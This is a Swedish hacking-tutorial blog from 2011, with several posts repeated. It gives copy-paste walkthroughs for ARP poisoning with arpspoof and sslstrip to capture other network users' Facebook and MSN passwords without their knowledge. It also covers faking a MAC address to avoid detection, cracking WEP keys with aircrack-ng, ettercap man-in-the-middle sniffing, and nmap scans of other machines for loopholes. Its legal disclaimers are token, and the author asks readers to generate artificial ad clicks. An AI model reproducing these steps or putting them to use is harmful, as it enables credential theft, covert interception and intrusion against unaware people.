Som rubriken lyder, jag söker en extra skribent för jag inte har så mycket tid längre att ägna åt bloggen.
Så om det finns någon kunnig, det måste vara en seriös person som jag kan lita på.
Lämna förslag eller frågor i kommentarerna.
MvH/
Ninja
torsdag 28 april 2011
onsdag 27 april 2011
Ettecap och wireshark
Idag ska vi göra en MITM attack eller snarare en man in the middle attack.
först och främst ska ni lära er vad det är (annars ser jag ingen mening med detta) http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Läs på och pröva.
Vi kommer använda oss av "ettercap" och om ni vill "wireshark".
ettercap är ett jätte bra "paket-fångar-verktyg" som vi/ni kommer gilla.
wireshark är i stort sätt detsamma men utför inte "arp poisonin" (och i GUI)
Ettercap och Wireshark finns i backtrack och i ubuntu är koderna simpla:
sudo apt-get install wireshark
sudo apt-get install ettercap
(ettercap kan behöva något extra packet om det inte fungerar, skriv i kommentarerna om det verkligen behövs)
När ni skriver så tänk på att det är skillnad mellan ett stort T från ett litet t, då dom har olika meningar.
-T = Text (så ni får med text helt enkelt i aktiva loggen)
-P = Plugin, det finns flera pluggins i ettercap och dom kan vara nödvändiga ibland
-M = mitm
-q = silent mode (skriv ettercap --help om ni vill läsa mera om kommandona)
ARP = arp poisonin, behövs om du ska göra en effektiv sniffning
// = är till för gateway såväll som ip. lite svårt att förklara men ni kan tillexempel skriva "ettercap -T // //" då skannar ni hela nätverket efter alla dom 255 platserna som finns, skriver ni däremot "ettercap -T /192.168.0.1/ /192.168.0.64/" så sitter ni imellan "192.168.0.64" datorn och routern.
-i = interface, tex "ettercap -T -i wlan0"
Som fullt exempel:
Ettecap -T -i eth0 -M arp // //
då skannar vi hela nätverket efter paket och kör det i Text-mode och använder oss av Interfacet eth0 vilket är min nätverksport för lan sladden.
skriv bara wireshark så startas det, välj vilket interface du ska använda dig av och kör på.
du kan också filtrera så du ser tex bara http trafik eller bara msn konversationer ;) hehe
för att filtrera så du bara ser http trafike skriver du bara "http" uppe i inboxen.
för msn paket skriver du "msnms" vilket du får upp ett gäng paket som du sen får klicka upp för att sen läsa av paketen.
Happy hunting!
MvH/
Ninja :)
lördag 23 april 2011
Lördag apr 23
Hoppas ni haft det bra nu i påsk och hoppas ni det gått bra att läsa den här bloggen!
Idag vill jag helst se så att ni lärt er lite ifrån den senaste posten och ni kan väl skriva i kommentarerna vad som kan förbättras med bloggen och vad ni lärt er hittills och vad ni tycker om det jag gör :)
MvH/
Ninja
(P.S jag kommer förmodligen lägga upp ett till inlägg om det bara är tillräckligt många som svarar idag)
Idag vill jag helst se så att ni lärt er lite ifrån den senaste posten och ni kan väl skriva i kommentarerna vad som kan förbättras med bloggen och vad ni lärt er hittills och vad ni tycker om det jag gör :)
MvH/
Ninja
(P.S jag kommer förmodligen lägga upp ett till inlägg om det bara är tillräckligt många som svarar idag)
fredag 22 april 2011
Fredag apr 22
Vad går vi igenom idag? jo vi ska lära oss hur vi "sniffar"
alltså vi ska lära oss hur vi avlyssnar datortrafiken mellan olika datorer osv.
Men först och främst!!
Återigen så förväntar jag mig stöd ifrån er och hoppas ni kan göra det igen :) (läs dom 2 föregångna posterna om du inte vet vad jag menar) Tack på förhand alla!
Vi kommer gå igenom en enkel typ av sniffing attack, vi kommer använda oss av "arpspoof" och "sslstrip"
er på backtrack har det redan, er på ubuntu måste ni skaffa dom via apt-get install och sslstrip genoms deras hemsida ( se tidigare post )
Så vad vi kommer göra är att förgifta nätverket och göra så den skickar genom alla paket genom våran dator. Vi kommer snappa upp saker såsom Facebook konton msn konton osv, alltså i stort sätt alla som loggar in på något i nätverket kommer inte veta om att vi får deras information.
vi kommer skicka ett slags "gift" till routern så att vi kan få paketen.
Först och främst måste vi ändra 2 små saker.. så vi kan göra en "portforwarding"
kopiera och klistra in:
echo "1" > /proc/sys/net/ipv4/ip_forward
Kopiera och klistra in:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Det här är ett måste om ni ska kunna lyckas : >
Och jag säger det igen att det inte är lagligt att göra det här på andras nätverk och jag kommer nu visa er ett sätt hur ni döljer eran Mac-adress så ni inte blir upptäckta, Ni får själv stå för om ni gör något ni inte får och jag ska inte stå för era dumma handlingar.
För att gömma eran mac-adress så skriver ni:
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
Det ni nu gör är att ni fejkar eran nuvarande adress till "00:11:22:33:44:55", ni kan ändra den hu ni vill det spelar ingen roll.
sslstrip är ett utmärkt verktyg och läs gärna om det från deras hemsida så satt säga http://www.thoughtcrime.org/software/sslstrip/
Det är till för att fånga diverse http-trafik.
ni skriver nu i terminalen:
sslstrip -w randomname
"randomname är bara output namnet för själva filen vi kommer lagra alla lösenord osv i"
Öppna en ny terminal och skriv föjlande:
arpspoof -i wlan0 192.168.0.1 exempelvis
"(-i står för interface och ni ska nu välja erat interface)
(192.168.0.1 är bara ett exempel och det ska stå eran gateway adress där vilket du kan hitta om du skriver "route-n")
nu ska ni ha 2 fönster upp varav ett är sslstrip och andra arpspoof.
Ta en kopp kaffe eller gå"ut och gå och låt det här köras ett tag. minst 10minuter för det längre du väntar dess bättre saker kan du snappa upp :D
när ni nu vill avsluta era saker så kryssa ner allt bara och öppna eran fil där ni sparade era saker (min var tex randomname)
öppna den med ett vanligt textprogram såsom "kate")
tryck sedan F3 eller CTRL+F så ni kan söka i det här överdrift länga textdokument, sökordet ska/kan vara "pass" för då hittar ni oftast både lösenord och användarnamn, annars kan ni skriva "user".
Det borde vara allt! lämna en kommentar och stöd mig som jag sagt från tidigare inlägg :)
Ha en förjävla bra fredag!
MvH/
Ninja ;)
alltså vi ska lära oss hur vi avlyssnar datortrafiken mellan olika datorer osv.
Men först och främst!!
Återigen så förväntar jag mig stöd ifrån er och hoppas ni kan göra det igen :) (läs dom 2 föregångna posterna om du inte vet vad jag menar) Tack på förhand alla!
Vi kommer gå igenom en enkel typ av sniffing attack, vi kommer använda oss av "arpspoof" och "sslstrip"
er på backtrack har det redan, er på ubuntu måste ni skaffa dom via apt-get install och sslstrip genoms deras hemsida ( se tidigare post )
Så vad vi kommer göra är att förgifta nätverket och göra så den skickar genom alla paket genom våran dator. Vi kommer snappa upp saker såsom Facebook konton msn konton osv, alltså i stort sätt alla som loggar in på något i nätverket kommer inte veta om att vi får deras information.
vi kommer skicka ett slags "gift" till routern så att vi kan få paketen.
Först och främst måste vi ändra 2 små saker.. så vi kan göra en "portforwarding"
kopiera och klistra in:
echo "1" > /proc/sys/net/ipv4/ip_forward
Kopiera och klistra in:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Det här är ett måste om ni ska kunna lyckas : >
Och jag säger det igen att det inte är lagligt att göra det här på andras nätverk och jag kommer nu visa er ett sätt hur ni döljer eran Mac-adress så ni inte blir upptäckta, Ni får själv stå för om ni gör något ni inte får och jag ska inte stå för era dumma handlingar.
För att gömma eran mac-adress så skriver ni:
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
Det ni nu gör är att ni fejkar eran nuvarande adress till "00:11:22:33:44:55", ni kan ändra den hu ni vill det spelar ingen roll.
sslstrip är ett utmärkt verktyg och läs gärna om det från deras hemsida så satt säga http://www.thoughtcrime.org/software/sslstrip/
Det är till för att fånga diverse http-trafik.
ni skriver nu i terminalen:
sslstrip -w randomname
"randomname är bara output namnet för själva filen vi kommer lagra alla lösenord osv i"
Öppna en ny terminal och skriv föjlande:
arpspoof -i wlan0 192.168.0.1 exempelvis
"(-i står för interface och ni ska nu välja erat interface)
(192.168.0.1 är bara ett exempel och det ska stå eran gateway adress där vilket du kan hitta om du skriver "route-n")
nu ska ni ha 2 fönster upp varav ett är sslstrip och andra arpspoof.
Ta en kopp kaffe eller gå"ut och gå och låt det här köras ett tag. minst 10minuter för det längre du väntar dess bättre saker kan du snappa upp :D
när ni nu vill avsluta era saker så kryssa ner allt bara och öppna eran fil där ni sparade era saker (min var tex randomname)
öppna den med ett vanligt textprogram såsom "kate")
tryck sedan F3 eller CTRL+F så ni kan söka i det här överdrift länga textdokument, sökordet ska/kan vara "pass" för då hittar ni oftast både lösenord och användarnamn, annars kan ni skriva "user".
Det borde vara allt! lämna en kommentar och stöd mig som jag sagt från tidigare inlägg :)
Ha en förjävla bra fredag!
MvH/
Ninja ;)
onsdag 20 april 2011
Då fortsätter vi!
Vi börjar väl med att kunna knäcka WEP-nycklar tycker jag.
Vad kommer vi använda oss av och vilka är programmen?
aircrack-ng är det vi ska använda oss av och för er som sitter på backtrack har det redan och för er som sitter på ubuntu är det "apt-get install aircrack-ng"
Programmet "aircrack" är text baserat och är till för att knäcka nycklar som wep tex.
Det går också att knäcka WPA men eftersom det är en starkare kryptering så är det nästintill omöjligt att knäcka det.
När/om man ska knäcka WPA så fångar du en "handshake" och därefter gör ett försök till att knäcka krypteringen med en hjälp av en passwordlist, det är alltså så att lösenordet måste finnas i den listan för att det ska gå att knäcka.
Vi kommer nog inte gå in på det här med WPA knäckning på ett bra tag utan hade tänk att ta det vi ett senare tillfälle!
Men idag så ska vi ta en titt på wep krypteringar : )
Om ni sitter i ubuntu så glöm inte att göra er till SU innan ni skriver alla kommandon!!
Om ni är i backtrack så är det bara att köra på som vanligt.
Först öppnar ni en terminal och skriver "airmon-ng" för att se vilket interface ni kommer använda er av.
Ni ska sen starta erat interface så vi kan anvade det som "monitor mode" , vi skriver airmon-ng start "interface"
Tillexempel om ni använder er av wlan0 så ska vi skriva airmon-ng start wlan0
När ni fått igång erat interface så skriver vi nu "airodump-ng mon0" (notera att det inte behöver vara just "mon0" för er utan ni väljer det interface ni får efter ni skrivit airmon-ng start "interface")
Airodump är för att fånga närliggande nätverk och fånga upp vissa saker.
När ni skrivit exempel airodump-ng mon0 så ska alla trådlösa nätverk runt om er komma upp i fönstret.
Ni kommer också se vad dom har för krypteringar osv.
Nu ska ni kopiera BSSID:n och komma ihåg vilken kanal nätverket ligger på.
Channel number är det som ligger i spalten "ch" och kan variera från och vara olika och samma som andra nätverk, bssid är det långa nummret som kan se ut så här : 11:22:33:44:55 tex.
Jag tar för givet att ni gör det här i erat eget nätverk då det inte får göras i andras nätverk.
Vi ska nu "låsa" nätveket. (notera att vi kommer behöva informationen ifrån förra kommandot vi gjorde)
Airodump-ng -c 1 --bssid 11:22:33:44:55 -w wep mon0
GLÖM INTE ATT SÄTTA ERAT INTERFACE EFTER VARJE KOMMANDO, då den måste veta vilket kort den ska använda sig av.
(11:22:33:44:55 är bara ett exempel och ni tar det ni har)
(1 är för kanal nummret och behöver inte vara 1 i erat tillfälle)
"-c" är vilken kanal vi kommer gå efter och då tar ni det från ovan.
"--bssid" för bssid:n som ni förhoppningsvis kopierade från ovan.
När jag skriver "-w wep" så är sjävla wep i det här tillfället namnet jag ger filen som vi kommer knäcka.
Om ni lyckas så har vi nu låst fast nätverket.
då börjar ni attacken
Öppna en ny terminal och låt den första vara kvar!!
nästa steg är själva "attacken" och kommer utföras med kommando "aireplay-ng"
om ni behöver hjälp så skriver aireplay-ng -? eller aireplay-ng --help eller liknande.
Aireplay-ng -1 1 -a "bssiden" mon0
Tillexepel aireplay-ng -1 1 -a 11:22:33:44:44 mon0
nu låter ni den här vara och öppnar ytligare en terminal.
Nu skriver ni aireplay-ng -3 -b "BSSID" mon0
Detta kan ta lite tid och ni får ha tålamod. ni ska ha exakt 3 fönster uppe och det ska/kommer rulla in massa saker i det senaste terminalen där vi skrev kommandot ovan.
Det kan ta upp till 10 minuter men brukar inte det.
Ni ska ha alla saker igång och ni ska kolla på det första fönstret där ni låste fast erat nätverk (airodump-ng fönstret) och kolla på där det står "data"
När ni har kommit upp i över 5000data ( det är det absolut minsta vi behöver) så kan ni pröva att knäcka det.
Ibland kan det behövas mera paket och då låter ni det vara tills ni är uppe i över 20000 data, annars är det bara att fortsätta : )
Sista kommandot för sjävla "knäckningen" är:
aircrack-ng wep-01.cap
(om nu eran fil heter det) skriv "ls" för att kolla efterfilen.
Den kommer sen gå igenom och förhoppningsvis hitta lösenordet.
Då kommer ni ha eran nyckel.
Återigen!! behöver erat stöd för att hålla igång bloggen så försök ska några som kan kolla min blogg.
och det som hjälper mig mest är att ni öppnar all min reklam på sidan i nya fönster och håller dom uppe i minst typ 10sekunder(om ni gör det varje dag så kommer jag kunna hålla igång sidan exakt hela tiden och kommer kunna vara extremt aktiv! )
Följ gärna bloggen om inte annat!
Tack för er som stödjer mig och imorgon kommer vi gå igenom hur du döjler din mac-adress ;)
(som "läxa" tills imorn ska ni kolla upp och lära er om vad en macadress är om ni inte vet det.
MvH/
Ninja :)
Vad kommer vi använda oss av och vilka är programmen?
aircrack-ng är det vi ska använda oss av och för er som sitter på backtrack har det redan och för er som sitter på ubuntu är det "apt-get install aircrack-ng"
Programmet "aircrack" är text baserat och är till för att knäcka nycklar som wep tex.
Det går också att knäcka WPA men eftersom det är en starkare kryptering så är det nästintill omöjligt att knäcka det.
När/om man ska knäcka WPA så fångar du en "handshake" och därefter gör ett försök till att knäcka krypteringen med en hjälp av en passwordlist, det är alltså så att lösenordet måste finnas i den listan för att det ska gå att knäcka.
Vi kommer nog inte gå in på det här med WPA knäckning på ett bra tag utan hade tänk att ta det vi ett senare tillfälle!
Men idag så ska vi ta en titt på wep krypteringar : )
Om ni sitter i ubuntu så glöm inte att göra er till SU innan ni skriver alla kommandon!!
Om ni är i backtrack så är det bara att köra på som vanligt.
Först öppnar ni en terminal och skriver "airmon-ng" för att se vilket interface ni kommer använda er av.
Ni ska sen starta erat interface så vi kan anvade det som "monitor mode" , vi skriver airmon-ng start "interface"
Tillexempel om ni använder er av wlan0 så ska vi skriva airmon-ng start wlan0
När ni fått igång erat interface så skriver vi nu "airodump-ng mon0" (notera att det inte behöver vara just "mon0" för er utan ni väljer det interface ni får efter ni skrivit airmon-ng start "interface")
Airodump är för att fånga närliggande nätverk och fånga upp vissa saker.
När ni skrivit exempel airodump-ng mon0 så ska alla trådlösa nätverk runt om er komma upp i fönstret.
Ni kommer också se vad dom har för krypteringar osv.
Nu ska ni kopiera BSSID:n och komma ihåg vilken kanal nätverket ligger på.
Channel number är det som ligger i spalten "ch" och kan variera från och vara olika och samma som andra nätverk, bssid är det långa nummret som kan se ut så här : 11:22:33:44:55 tex.
Jag tar för givet att ni gör det här i erat eget nätverk då det inte får göras i andras nätverk.
Vi ska nu "låsa" nätveket. (notera att vi kommer behöva informationen ifrån förra kommandot vi gjorde)
Airodump-ng -c 1 --bssid 11:22:33:44:55 -w wep mon0
GLÖM INTE ATT SÄTTA ERAT INTERFACE EFTER VARJE KOMMANDO, då den måste veta vilket kort den ska använda sig av.
(11:22:33:44:55 är bara ett exempel och ni tar det ni har)
(1 är för kanal nummret och behöver inte vara 1 i erat tillfälle)
"-c" är vilken kanal vi kommer gå efter och då tar ni det från ovan.
"--bssid" för bssid:n som ni förhoppningsvis kopierade från ovan.
När jag skriver "-w wep" så är sjävla wep i det här tillfället namnet jag ger filen som vi kommer knäcka.
Om ni lyckas så har vi nu låst fast nätverket.
då börjar ni attacken
Öppna en ny terminal och låt den första vara kvar!!
nästa steg är själva "attacken" och kommer utföras med kommando "aireplay-ng"
om ni behöver hjälp så skriver aireplay-ng -? eller aireplay-ng --help eller liknande.
Aireplay-ng -1 1 -a "bssiden" mon0
Tillexepel aireplay-ng -1 1 -a 11:22:33:44:44 mon0
nu låter ni den här vara och öppnar ytligare en terminal.
Nu skriver ni aireplay-ng -3 -b "BSSID" mon0
Detta kan ta lite tid och ni får ha tålamod. ni ska ha exakt 3 fönster uppe och det ska/kommer rulla in massa saker i det senaste terminalen där vi skrev kommandot ovan.
Det kan ta upp till 10 minuter men brukar inte det.
Ni ska ha alla saker igång och ni ska kolla på det första fönstret där ni låste fast erat nätverk (airodump-ng fönstret) och kolla på där det står "data"
När ni har kommit upp i över 5000data ( det är det absolut minsta vi behöver) så kan ni pröva att knäcka det.
Ibland kan det behövas mera paket och då låter ni det vara tills ni är uppe i över 20000 data, annars är det bara att fortsätta : )
Sista kommandot för sjävla "knäckningen" är:
aircrack-ng wep-01.cap
(om nu eran fil heter det) skriv "ls" för att kolla efterfilen.
Den kommer sen gå igenom och förhoppningsvis hitta lösenordet.
Då kommer ni ha eran nyckel.
Återigen!! behöver erat stöd för att hålla igång bloggen så försök ska några som kan kolla min blogg.
och det som hjälper mig mest är att ni öppnar all min reklam på sidan i nya fönster och håller dom uppe i minst typ 10sekunder(om ni gör det varje dag så kommer jag kunna hålla igång sidan exakt hela tiden och kommer kunna vara extremt aktiv! )
Följ gärna bloggen om inte annat!
Tack för er som stödjer mig och imorgon kommer vi gå igenom hur du döjler din mac-adress ;)
(som "läxa" tills imorn ska ni kolla upp och lära er om vad en macadress är om ni inte vet det.
MvH/
Ninja :)
tisdag 19 april 2011
Bara att köra då!
Så nu är det så att jag låter er bestämma vad jag ska gå igenom till viss del!
Lämna en kommentar om vad ni tycker om det och vad ni vill lära er så kommer jag försöka gå igenom så många som möjligt!
Det ska köras på hårt nu under påsken ;)
!Läs!
För att jag ska kunna fortsätta att köra bloggen och kunna lära ut så behöver jag mera personer som kollar till den här sidan och jag kommer ju ingenstans utan er.
Så nu ber jag er, varje gång ni kollar in min blogg (gärna dagligen :) ) så tryck upp mina aviseringar och lämna någon kommentar så kommer jag lyckas fortsätta med det här.
(uppskattar verkligen om ni "följer" bloggen med "följ" knappen uppe i hörnet)
Tack på förhand och lovar att jag kommer vara mer aktiv än förut!
Mvh/
Ninja
Lämna en kommentar om vad ni tycker om det och vad ni vill lära er så kommer jag försöka gå igenom så många som möjligt!
Det ska köras på hårt nu under påsken ;)
!Läs!
För att jag ska kunna fortsätta att köra bloggen och kunna lära ut så behöver jag mera personer som kollar till den här sidan och jag kommer ju ingenstans utan er.
Så nu ber jag er, varje gång ni kollar in min blogg (gärna dagligen :) ) så tryck upp mina aviseringar och lämna någon kommentar så kommer jag lyckas fortsätta med det här.
(uppskattar verkligen om ni "följer" bloggen med "följ" knappen uppe i hörnet)
Tack på förhand och lovar att jag kommer vara mer aktiv än förut!
Mvh/
Ninja
Ninja is back!
Jag vet att ni fått vänta men jag har inte kunnat gjort så mycket åt det.
Jag kommer fortsätta idag och se till att få bloggen rullandes igen :)
Däremot kommer jag inte ha filmen som jag sa förut eftersom hårddisken pajade.
MvH/
Ninja
Jag kommer fortsätta idag och se till att få bloggen rullandes igen :)
Däremot kommer jag inte ha filmen som jag sa förut eftersom hårddisken pajade.
MvH/
Ninja
tisdag 12 april 2011
Vad ska man göra.
jag vet inte riktigt hur jag ska göra... har ingen dator (sitter i skolan och skriver till er) så kan inte hålla igång bloggen -.-
Jag lovar att så fort som möjligt ska jag köra igång den igen och göra den som den skulle vara från början.
Sorry för att inte fått några inlägg..
Jag lovar att så fort som möjligt ska jag köra igång den igen och göra den som den skulle vara från början.
Sorry för att inte fått några inlägg..
fredag 8 april 2011
Datorn är paj...
som rubriken lyder, jag får en ny hårdisk på måndag och kan därefter fortsätta den här bloggen därifrån.
efter dom här problemen är lösta så kommer allt att gå framåt som vanligt, ber om ursäkt för dom som tar illa upp men kan inte göra så mycket för tillfället...
tills på måndag behöver nu aircrack-ng.
Hjälp gärna varandra i kommentarerna!!
Ses på måndag alla!
MvH/
Ninja
efter dom här problemen är lösta så kommer allt att gå framåt som vanligt, ber om ursäkt för dom som tar illa upp men kan inte göra så mycket för tillfället...
tills på måndag behöver nu aircrack-ng.
Hjälp gärna varandra i kommentarerna!!
Ses på måndag alla!
MvH/
Ninja
torsdag 7 april 2011
Ajdå
Tyvärr upplever jag vissa stora datorproblem så kommer inte kunna göra det jag tänkt göra idag utan kommer däremot lägga upp en video imorgon (och text) på bloggen om att hacka trådlöst (helt på svenska)
Sitter på min kompis dator och försöker rädda filmen från min dator som ni skulle ha sätt idag.
Ber om ursäkt då jag inte heller kommer att kunna besvara på frågor idag...
Kommer fixa allt imorgon.
MvH/
Ninja
Sitter på min kompis dator och försöker rädda filmen från min dator som ni skulle ha sätt idag.
Ber om ursäkt då jag inte heller kommer att kunna besvara på frågor idag...
Kommer fixa allt imorgon.
MvH/
Ninja
Torsdag
Vi kommer gå igenom alla program som jag sagt stegvis och kommer arbeta i eran takt.
!NOTERA!
Allt ni lär er är endast till för utbildningssyfte och ni har själva allt ansvar för det ni gör.
Och för all del, om ni ska pröva det här så gör det i erat eget nätverk!
Jag kommer senare idag (kl 3-5) lägga upp dagens uppgift och det ni kommer arbeta med idag.
Hämta hem "aircrack" om ni sitter på ubuntu.
apt-get install aircrack-ng
ni på backtrack har det redan.
Våran uppgift idag är att knäcka ett trådlöst nätverk med krypteringen WEP-
Och precis som jag bad er igår att göra (fortfarande inget tvång men kan vara hjälpsamt för mig)
så kan ni klicka upp reklamen och "följa" min blogg.
Tack på förhand och vi ses ikväll!
MvH/
Ninja
!NOTERA!
Allt ni lär er är endast till för utbildningssyfte och ni har själva allt ansvar för det ni gör.
Och för all del, om ni ska pröva det här så gör det i erat eget nätverk!
Jag kommer senare idag (kl 3-5) lägga upp dagens uppgift och det ni kommer arbeta med idag.
Hämta hem "aircrack" om ni sitter på ubuntu.
apt-get install aircrack-ng
ni på backtrack har det redan.
Våran uppgift idag är att knäcka ett trådlöst nätverk med krypteringen WEP-
Och precis som jag bad er igår att göra (fortfarande inget tvång men kan vara hjälpsamt för mig)
så kan ni klicka upp reklamen och "följa" min blogg.
Tack på förhand och vi ses ikväll!
MvH/
Ninja
onsdag 6 april 2011
Dagens
Vill nu till en början utforskar programmet nmap.
Det är ett scannings verktyg.
För att kolla alla i ditt nätverk kan du tex. enkelt skicka ut "ping-request" till alla genom att skriva Nmap -sp "gatewayadressen" sen /24
Alltså tex.
nmap -sp 172.20.0.1/24 så får du se alla i nätverket.
skriv route -n så ser du din gateway.
Du ser då deras ip och macadress.
Använd mera avancerade kommandon som tex. nmap -sS -v -PN 172.20.0.1-255 (då kollar du igenom efter öppna portar i den andra dator och eventuella kryphål mm. ;) )
Ni ska utforska nmap och dess möjligheter.
som om du tex. skulle köra "nmap -sP 172.20.0.1/24 (då ser du alla andra datorer och enheter så som laptops eller iphones och liknande i nätverket du sitter i)
och du kanske vill veta mer om just enheten "172.20.0.157"
då¨kan du skriva nmap -sP -v -PN 172.20.0.157 för att kolla genom just den i nätverket.
Utforska och upptäck möjligheter i detta program. Det är dagens uppgift då vi kommer att använda det här till i stort sätt alla ALLA saker vi kommer gå igenom.
för att hjälpa mig genomföra och fortsätta den här bloggen så kan ni om ni vill (tvingar er verkligen inte, ni behöver inte göra det om ni inte känner för det) kanske bjuda in vänner till att kolla min blogg, trycka upp reklamen på min sida i några nya flikar och håll kvar det i minst 10-15 sekunder eller helst av allt "följa" min blogg( vilket det finns en knapp till i övre panelen)
Tack på förhand och jag kommer garantera att ni kommer kunna ett och annat när ni är klara ;) hehehe
MvH eran Hacker brutta/
Ninja
Det är ett scannings verktyg.
För att kolla alla i ditt nätverk kan du tex. enkelt skicka ut "ping-request" till alla genom att skriva Nmap -sp "gatewayadressen" sen /24
Alltså tex.
nmap -sp 172.20.0.1/24 så får du se alla i nätverket.
skriv route -n så ser du din gateway.
Du ser då deras ip och macadress.
Använd mera avancerade kommandon som tex. nmap -sS -v -PN 172.20.0.1-255 (då kollar du igenom efter öppna portar i den andra dator och eventuella kryphål mm. ;) )
Ni ska utforska nmap och dess möjligheter.
som om du tex. skulle köra "nmap -sP 172.20.0.1/24 (då ser du alla andra datorer och enheter så som laptops eller iphones och liknande i nätverket du sitter i)
och du kanske vill veta mer om just enheten "172.20.0.157"
då¨kan du skriva nmap -sP -v -PN 172.20.0.157 för att kolla genom just den i nätverket.
Utforska och upptäck möjligheter i detta program. Det är dagens uppgift då vi kommer att använda det här till i stort sätt alla ALLA saker vi kommer gå igenom.
för att hjälpa mig genomföra och fortsätta den här bloggen så kan ni om ni vill (tvingar er verkligen inte, ni behöver inte göra det om ni inte känner för det) kanske bjuda in vänner till att kolla min blogg, trycka upp reklamen på min sida i några nya flikar och håll kvar det i minst 10-15 sekunder eller helst av allt "följa" min blogg( vilket det finns en knapp till i övre panelen)
Tack på förhand och jag kommer garantera att ni kommer kunna ett och annat när ni är klara ;) hehehe
MvH eran Hacker brutta/
Ninja
Happy mode!
Verkligen glad på responsen jag fått ifrån er!
Jag kommer skriva senare idag (runt kl 3-5 eller när jag får tid)
tills dess måste ni skaffa följande: Nmap, ettercap, arpspoof, sslstrip. för er som sitter på ubuntu, ni som har backtrack har redan det.
Ni som har ubuntu som ska skaffa ovanstående.
apt-get install nmap
apt-get install ettercap
sslstrip på http://www.thoughtcrime.org/software/sslstrip/
Lycka till!
nu börjar det.... ;)
MvH/
Ninja
Jag kommer skriva senare idag (runt kl 3-5 eller när jag får tid)
tills dess måste ni skaffa följande: Nmap, ettercap, arpspoof, sslstrip. för er som sitter på ubuntu, ni som har backtrack har redan det.
Ni som har ubuntu som ska skaffa ovanstående.
apt-get install nmap
apt-get install ettercap
sslstrip på http://www.thoughtcrime.org/software/sslstrip/
Lycka till!
nu börjar det.... ;)
MvH/
Ninja
tisdag 5 april 2011
Har ni lärt er något?
Jag vill gärna ha lite svar ifrån er då jag inte vet hur mycket ni har kommit hittills .
Jag vill att ALLA som har något intresse av den här bloggen ska svara på det här inlägget i kommentarena och skriva att ni kan det här och vad ni behöver hjälp med.
Kommer inte skriva något mer inlägg förens ni har visat mig att ni har kommit en bit.
Vill inte verka hård utan vill att ni ska ta det här på allvar.
MvH/
Ninja
Jag vill att ALLA som har något intresse av den här bloggen ska svara på det här inlägget i kommentarena och skriva att ni kan det här och vad ni behöver hjälp med.
Kommer inte skriva något mer inlägg förens ni har visat mig att ni har kommit en bit.
Vill inte verka hård utan vill att ni ska ta det här på allvar.
MvH/
Ninja
måndag 4 april 2011
Måndag.
Innan vi börjar gå igenom programmen så ska ni gå in på google och wikepedia och lära er vad följande saker är:
* Ip-adress (a,b och c klass adresser)
* Macadress
*Subnät
* Gateway
* Hur du kommer in i din router och kan ändra inställningar.
Det där MÅSTE ni kunna innan vi går vidare.
Ha en trevlig kväll :)
MvH /
Ninja :)
* Ip-adress (a,b och c klass adresser)
* Macadress
*Subnät
* Gateway
* Hur du kommer in i din router och kan ändra inställningar.
Det där MÅSTE ni kunna innan vi går vidare.
Ha en trevlig kväll :)
MvH /
Ninja :)
söndag 3 april 2011
Söndag apr/3
För er som är klara med det som vi gått igenom ska nu försöka bli lite vana vid att använde erat operativsystem så ni inte kommer behöva fråga mig om allt :)
Lär er att hantera lite grundläggande saker och försök utforska lite mer i vad man kan använda det hela till.
Bättre att ni lär er lite själv än att jag ska sitta och gå igenom allt åt er ;)
Idag ska ni ALLA göra följande..
Först måste ni öppna terminalen. ( kommer visa er hur ni navigerar er runt )
Låt oss säga att ni är i mappen "home" (i terminalen, ser det ut så här: root:/home tex.) och vi vill se allt som finns i mappen? då skriver ni "ls" vilket visar allt som finns i mappen du är i.
Sen om du vill byta map du är i så skriver du tex: cd desktop ( då hamnar du på skrivbordet)
Och skriver du nu ls så ser du allt du har på skrivbordet i terminalen.
Och om vi vill se vart vi är (alltså hela sökvägen) så skriver ni "pwd" så visar den det.
skulle vi vilja gå tillbaka ett steg från tillexepel "root:/home/desktop till root:/home/" (alltså backa ett steg bara) så skriver ni "cd .." vilket enkelt nog tar er tillbaka ett steg.
Lite grundläggande kanske men en del behöver den här informationen.
Frågor i kommentarerna som vanlig och jag kommer finnas här hela dagen.
MvH/
Ninja
Lär er att hantera lite grundläggande saker och försök utforska lite mer i vad man kan använda det hela till.
Bättre att ni lär er lite själv än att jag ska sitta och gå igenom allt åt er ;)
Idag ska ni ALLA göra följande..
Först måste ni öppna terminalen. ( kommer visa er hur ni navigerar er runt )
Låt oss säga att ni är i mappen "home" (i terminalen, ser det ut så här: root:/home tex.) och vi vill se allt som finns i mappen? då skriver ni "ls" vilket visar allt som finns i mappen du är i.
Sen om du vill byta map du är i så skriver du tex: cd desktop ( då hamnar du på skrivbordet)
Och skriver du nu ls så ser du allt du har på skrivbordet i terminalen.
Och om vi vill se vart vi är (alltså hela sökvägen) så skriver ni "pwd" så visar den det.
skulle vi vilja gå tillbaka ett steg från tillexepel "root:/home/desktop till root:/home/" (alltså backa ett steg bara) så skriver ni "cd .." vilket enkelt nog tar er tillbaka ett steg.
Lite grundläggande kanske men en del behöver den här informationen.
Frågor i kommentarerna som vanlig och jag kommer finnas här hela dagen.
MvH/
Ninja
lördag 2 april 2011
Dubbel trubbel
Då jag ser att rätt många stött på problem med att bara installera backtrack och inte fått visa saker att fungera så är jag tvungen att hjälpa dom innan jag kan gå vidare vilken kan vara lite tråkigt för er som hoppades på en bra inlägg idag.
Så det första jag kommer göra är att hjälpa dom som behöver hjälp så dom inte kör fast.
jag la upp lite bilder nedanför det här inlägget då jag tror att några kommer behöva dom som hjälp.
skriv i kommentarerna det ni undrar över så ska jag tillägna den här dagen att hjälpa dom som behöver hjälp och sen gå vidare.
Liten planering av vad vi kommer gå igenom den här veckan som kommer
Imorgon kommer jag försöka vara lite ledig eftersom jag har fullt upp i skolan och har mycket annat som tar upp mycket tid. kommer dock finnas till för dom som vill ha hjälp och behöver det. (något inlägg kommer nog upp)
Måndag: Kommer vi gå igenom lite mera grunder och förhoppningsvis komma igång lite.
Tisdag: Då hade jag tänk gå igenom ett scanning program och förklara lite om det och gå igenom hur du spårar ip adresser och kollar runt nätverket (både lokalt och på andra ställen)
Onsdag: kommer då gå igenom vad begreppet "phising" är och gå igenom program så som arpspoof, sslstrip och ettercap
